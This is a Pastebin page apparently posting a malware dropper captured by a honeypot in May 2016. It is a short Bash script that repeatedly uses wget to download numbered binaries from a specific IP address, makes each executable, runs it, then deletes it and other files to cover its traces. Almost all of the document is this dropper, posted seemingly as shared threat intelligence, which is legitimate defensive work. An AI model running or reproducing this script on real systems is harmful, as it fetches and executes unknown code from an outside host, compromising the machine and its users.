Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-05-30 01:11

May 29th, 2016
226
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.32 KB | None | 0 0
  1. #!/bin/bash
  2. wget http://199.101.48.210/10;  chmod +x 10; ./10;  rm -f 10*
  3. wget http://199.101.48.210/11;  chmod +x 11; ./11;  rm -f 11*
  4. wget http://199.101.48.210/12;  chmod +x 12; ./12;  rm -f 12*
  5. wget http://199.101.48.210/13;  chmod +x 13; ./13;  rm -f 13*
  6. wget http://199.101.48.210/14;  chmod +x 14; ./14;  rm -f 14*
  7. rm -f bin*
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement